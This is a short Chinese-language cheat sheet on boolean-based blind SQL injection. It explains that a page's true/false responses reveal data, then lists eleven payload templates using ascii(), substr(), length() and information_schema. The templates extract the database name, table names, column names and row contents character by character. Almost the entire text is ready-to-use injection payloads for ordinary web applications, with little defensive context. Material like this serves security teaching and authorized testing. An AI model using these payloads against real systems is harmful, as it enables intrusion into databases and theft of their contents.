基于布尔的盲注
在页面中,如果正确执行了SQL语句,则返回一种页面,如果SQL语句执行错误,则执行另一种页面。基于两种页面,来判断SQL语句正确与否,达到获取数据的目的。
payload
网上的payload一般是利用ascii()、substr()、length()结合进行利用。
1.获取数据库长度
and (select length(database()))=数据库名字长度
2.逐字猜解数据库名
and (select ascii(substr(database(),位数,1)))=ascii码
3.猜解表名数量
and (select count(table_name) from information_schema.tables where table_schema=database())=数量
4.猜解某个表长度
and (select length(table_name) from information_schema.tables where table_schema=database() limit n,1)=长度
5.逐位猜解表名
and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit n,1)=ascii码
6.猜解列名数量
and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 表名)=数量
7.猜解某个列长度
and (select length(column_name) from information_schema.columns where table_name="表名" limit n,1)=长度
8.逐位猜解列名
and (select ascii(substr(column_name,位数,1)) from information_schema.columns where table_name="表名" limit n,1)=ascii码
9.判断数据的数量
and (select count(列名) from 表名)=数量
10.猜解某条数据的长度
and (select length(列名) from 数据库名.表名 limit n,1)=长度
11.逐位猜解数据
and (select ascii(substr(user,位数,1)) from 数据库名.表名 limit n,1)=ascii码